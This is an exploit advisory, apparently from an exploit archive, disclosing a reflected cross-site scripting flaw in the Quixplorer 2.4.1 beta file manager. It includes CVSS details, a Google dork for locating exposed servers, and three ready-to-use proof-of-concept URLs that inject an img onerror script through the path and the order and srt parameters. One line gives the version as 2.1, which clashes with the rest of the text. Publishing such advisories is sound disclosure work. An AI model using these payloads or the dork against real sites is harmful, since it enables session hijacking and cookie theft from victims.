Quixplorer 2.4.1 Beta Cross Site Scripting

Quixplorer version 2.1 Beta suffers from a cross site scripting vulnerability.

MD5 | e95fe1d277e4e821870231ebe223c12d

# Exploit Title: Reflected XSS in quixplorer-2.4.1beta 
# Google Dork: intitle:"My Download Server"
# Date: 04/24/2018
# Exploit Author: Adriano Marcio Monteiro (@adrianomarcmont)
# Exploit Author Site: https://www.brztec.com
# Exploit Author E-mail: [email protected]
# Vendor Homepage: http://quixplorer.sourceforge.net/
# Software Link: https://sourceforge.net/projects/quixplorer/files/unstable/2.4.1%20beta/quixplorer-2.4.1beta.zip/download
# Version: 2.4.1beta
# Tested on: All
# CVE : None
# CVSS Score: 4.7 Medium
# CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N
# CVSS Link: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N

Quixplorer-2.4.1beta is vulnerable to reflected cross-site scripting, caused by improper validation of user supplied input. A remote attacker could exploit this vulnerability using a specially crafted URL to execute a script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.

Parameters order, srt and arbitrarily supplied URL parameter are vulnerables.

PoC - Proof of Concept

http://localhost/quixplorer-2.4.1beta/index.php/r1e9f"><img src=x onerror=prompt(document.domain)>

http://localhost/quixplorer-2.4.1beta/index.php?action=post&order=bszop"><img src=x onerror=prompt(document.domain)>&srt=yes&lang=ptbr&do_action=&first=y&toggleAllC=on

http://localhost/quixplorer-2.4.1beta/index.php?action=post&order=name&srt=w1ixb"><img src=x onerror=prompt(document.domain)>&lang=ptbr&do_action=&first=y&toggleAllC=on

Related Posts